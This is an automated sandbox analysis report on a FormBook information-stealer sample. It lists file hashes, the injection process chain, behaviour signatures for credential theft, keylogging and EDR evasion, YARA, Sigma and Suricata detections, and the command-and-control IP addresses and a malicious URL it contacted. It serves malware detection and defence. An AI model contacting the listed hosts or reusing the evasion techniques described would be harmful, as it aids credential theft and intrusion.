Edit tour

Windows Analysis Report
ZmK1CAc4VP.exe

Overview

General Information

Sample name:	ZmK1CAc4VP.exe renamed because original name is a hash value
Original sample name:	4860f388e05ff7187b6286bc7efd58da119ca30a33a44d2493f473a95564c53f.dll.exe
Analysis ID:	1618202
MD5:	c69378487cc57cc0dea6deb85034520e
SHA1:	4df6d9f94f0f7d85cb37b0afb8f0e790d0aa53b4
SHA256:	4860f388e05ff7187b6286bc7efd58da119ca30a33a44d2493f473a95564c53f
Tags:	exetumbetgirislinki-fituser-JAMESWT_MHT
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Found direct / indirect Syscall (likely to bypass EDR)

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

PE file contains an invalid checksum

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

ZmK1CAc4VP.exe (PID: 5340 cmdline: "C:\Users\user\Desktop\ZmK1CAc4VP.exe" MD5: C69378487CC57CC0DEA6DEB85034520E)

svchost.exe (PID: 3360 cmdline: "C:\Users\user\Desktop\ZmK1CAc4VP.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

n4776Jcum1G.exe (PID: 5968 cmdline: "C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\cqBqnFhuJvw.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

systray.exe (PID: 6780 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)

n4776Jcum1G.exe (PID: 5220 cmdline: "C:\Program Files (x86)\ylQNqOxIoBlzXTCdVODpyRgHUdPRMTHBlvBoTvdSsyEKwyU\QkUL0EoXM0LYcq.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 3396 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000002.00000002.1686918719.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4009083957.0000000002830000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4010478338.0000000004240000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1687746502.0000000003750000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1688926331.00000000063F0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4013593379.0000000004F10000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4008861086.0000000002370000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4010273460.0000000002570000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\ZmK1CAc4VP.exe", CommandLine: "C:\Users\user\Desktop\ZmK1CAc4VP.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ZmK1CAc4VP.exe", ParentImage: C:\Users\user\Desktop\ZmK1CAc4VP.exe, ParentProcessId: 5340, ParentProcessName: ZmK1CAc4VP.exe, ProcessCommandLine: "C:\Users\user\Desktop\ZmK1CAc4VP.exe", ProcessId: 3360, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\ZmK1CAc4VP.exe", CommandLine: "C:\Users\user\Desktop\ZmK1CAc4VP.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\ZmK1CAc4VP.exe", ParentImage: C:\Users\user\Desktop\ZmK1CAc4VP.exe, ParentProcessId: 5340, ParentProcessName: ZmK1CAc4VP.exe, ProcessCommandLine: "C:\Users\user\Desktop\ZmK1CAc4VP.exe", ProcessId: 3360, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T18:35:01.560890+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49711	178.254.0.81	80	TCP
2025-02-18T18:35:27.818771+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49715	13.248.169.48	80	TCP
2025-02-18T18:35:50.061407+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49741	13.248.169.48	80	TCP
2025-02-18T18:36:03.810610+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49886	44.230.85.241	80	TCP
2025-02-18T18:36:17.193849+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49969	144.76.229.203	80	TCP
2025-02-18T18:36:32.066268+0100	2855465	1	A Network Trojan was detected	192.168.2.8	49999	104.21.48.1	80	TCP
2025-02-18T18:36:45.431388+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50003	13.248.169.48	80	TCP
2025-02-18T18:36:58.864679+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50007	69.57.163.227	80	TCP
2025-02-18T18:37:34.397633+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50011	45.199.72.207	80	TCP
2025-02-18T18:37:48.518726+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50015	202.79.161.151	80	TCP
2025-02-18T18:38:02.043154+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50019	84.32.84.32	80	TCP
2025-02-18T18:38:15.608787+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50023	188.114.96.3	80	TCP
2025-02-18T18:38:28.767984+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50027	13.248.169.48	80	TCP
2025-02-18T18:38:42.754973+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50031	217.160.0.24	80	TCP
2025-02-18T18:38:56.312515+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50035	109.206.161.72	80	TCP
2025-02-18T18:39:10.392740+0100	2855465	1	A Network Trojan was detected	192.168.2.8	50039	31.31.198.204	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-18T18:35:17.196907+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49712	13.248.169.48	80	TCP
2025-02-18T18:35:19.728378+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49713	13.248.169.48	80	TCP
2025-02-18T18:35:23.331069+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49714	13.248.169.48	80	TCP
2025-02-18T18:35:34.379331+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49717	13.248.169.48	80	TCP
2025-02-18T18:35:35.869339+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49718	13.248.169.48	80	TCP
2025-02-18T18:35:38.476278+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49725	13.248.169.48	80	TCP
2025-02-18T18:35:55.877385+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49833	44.230.85.241	80	TCP
2025-02-18T18:35:58.539813+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49849	44.230.85.241	80	TCP
2025-02-18T18:36:01.219905+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49870	44.230.85.241	80	TCP
2025-02-18T18:36:09.576648+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49918	144.76.229.203	80	TCP
2025-02-18T18:36:12.098574+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49937	144.76.229.203	80	TCP
2025-02-18T18:36:14.756167+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49953	144.76.229.203	80	TCP
2025-02-18T18:36:23.754527+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49996	104.21.48.1	80	TCP
2025-02-18T18:36:26.518715+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49997	104.21.48.1	80	TCP
2025-02-18T18:36:29.150557+0100	2855464	1	A Network Trojan was detected	192.168.2.8	49998	104.21.48.1	80	TCP
2025-02-18T18:36:37.726159+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50000	13.248.169.48	80	TCP
2025-02-18T18:36:40.135799+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50001	13.248.169.48	80	TCP
2025-02-18T18:36:43.924889+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50002	13.248.169.48	80	TCP
2025-02-18T18:36:51.218369+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50004	69.57.163.227	80	TCP
2025-02-18T18:36:53.805900+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50005	69.57.163.227	80	TCP
2025-02-18T18:36:56.312584+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50006	69.57.163.227	80	TCP
2025-02-18T18:37:06.643823+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50008	45.199.72.207	80	TCP
2025-02-18T18:37:09.441815+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50009	45.199.72.207	80	TCP
2025-02-18T18:37:11.988461+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50010	45.199.72.207	80	TCP
2025-02-18T18:37:40.862646+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50012	202.79.161.151	80	TCP
2025-02-18T18:37:43.440614+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50013	202.79.161.151	80	TCP
2025-02-18T18:37:45.971863+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50014	202.79.161.151	80	TCP
2025-02-18T18:37:54.407586+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50016	84.32.84.32	80	TCP
2025-02-18T18:37:56.935862+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50017	84.32.84.32	80	TCP
2025-02-18T18:37:59.496658+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50018	84.32.84.32	80	TCP
2025-02-18T18:38:07.811012+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50020	188.114.96.3	80	TCP
2025-02-18T18:38:10.313136+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50021	188.114.96.3	80	TCP
2025-02-18T18:38:13.116738+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50022	188.114.96.3	80	TCP
2025-02-18T18:38:21.121755+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50024	13.248.169.48	80	TCP
2025-02-18T18:38:23.660591+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50025	13.248.169.48	80	TCP
2025-02-18T18:38:26.218374+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50026	13.248.169.48	80	TCP
2025-02-18T18:38:34.521923+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50028	217.160.0.24	80	TCP
2025-02-18T18:38:37.055454+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50029	217.160.0.24	80	TCP
2025-02-18T18:38:39.611391+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50030	217.160.0.24	80	TCP
2025-02-18T18:38:48.754350+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50032	109.206.161.72	80	TCP
2025-02-18T18:38:51.230586+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50033	109.206.161.72	80	TCP
2025-02-18T18:38:53.762947+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50034	109.206.161.72	80	TCP
2025-02-18T18:39:02.405087+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50036	31.31.198.204	80	TCP
2025-02-18T18:39:04.764525+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50037	31.31.198.204	80	TCP
2025-02-18T18:39:07.280038+0100	2855464	1	A Network Trojan was detected	192.168.2.8	50038	31.31.198.204	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ZmK1CAc4VP.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.laohuc58.net/os8u/

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: ZmK1CAc4VP.exe	Virustotal: Detection: 34%			Perma Link
Source: ZmK1CAc4VP.exe	ReversingLabs: Detection: 70%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1686918719.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4009083957.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4010478338.0000000004240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1687746502.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1688926331.00000000063F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4013593379.0000000004F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4008861086.0000000002370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4010273460.0000000002570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: ZmK1CAc4VP.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: systray.pdb source: svchost.exe, 00000002.00000002.1687220730.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687200717.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, n4776Jcum1G.exe, 00000003.00000002.4009508324.000000000093E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: systray.pdbGCTL source: svchost.exe, 00000002.00000002.1687220730.0000000002E19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687200717.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, n4776Jcum1G.exe, 00000003.00000002.4009508324.000000000093E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: ZmK1CAc4VP.exe, 00000000.00000003.1561124881.0000000004540000.00000004.00001000.00020000.00000000.sdmp, ZmK1CAc4VP.exe, 00000000.00000003.1561459837.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687343966.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687343966.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594218736.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592417371.0000000003000000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4011091050.0000000004620000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1687201236.00000000042CD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1689124934.0000000004472000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4011091050.00000000047BE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: ZmK1CAc4VP.exe, 00000000.00000003.1561124881.0000000004540000.00000004.00001000.00020000.00000000.sdmp, ZmK1CAc4VP.exe, 00000000.00000003.1561459837.00000000043A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1687343966.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1687343966.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1594218736.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592417371.0000000003000000.00000004.00000020.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.4011091050.0000000004620000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1687201236.00000000042CD000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1689124934.0000000004472000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4011091050.00000000047BE000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: systray.exe, 00000004.00000002.4009177930.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4012982747.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4011202328.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1991213233.00000000361FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: systray.exe, 00000004.00000002.4009177930.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4012982747.0000000004C4C000.00000004.10000000.00040000.00000000.sdmp, n4776Jcum1G.exe, 00000006.00000002.4011202328.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1991213233.00000000361FC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: n4776Jcum1G.exe, 00000003.00000002.4009725651.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp, n4776Jcum1G.exe, 00000006.00000002.4009825612.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp

Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_004788BD
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\ZmK1CAc4VP.exe	Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4_2_0238C5C0 FindFirstFileW,FindNextFileW,FindClose,	4_2_0238C5C0

Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then xor eax, eax		4_2_02379ED0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_043704D2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49711 -> 178.254.0.81:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49715 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49712 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49713 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49833 -> 44.230.85.241:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49741 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49886 -> 44.230.85.241:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49918 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49714 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49725 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49969 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49953 -> 144.76.229.203:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49996 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50000 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50012 -> 202.79.161.151:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50002 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49870 -> 44.230.85.241:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50006 -> 69.57.163.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50011 -> 45.199.72.207:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50010 -> 45.199.72.207:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50005 -> 69.57.163.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50016 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50017 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49999 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50032 -> 109.206.161.72:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50031 -> 217.160.0.24:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50001 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50018 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49997 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49717 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50014 -> 202.79.161.151:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50021 -> 188.114.96.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:50015 -> 202.79.161.151:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:50020 -> 188.114.96.3:80
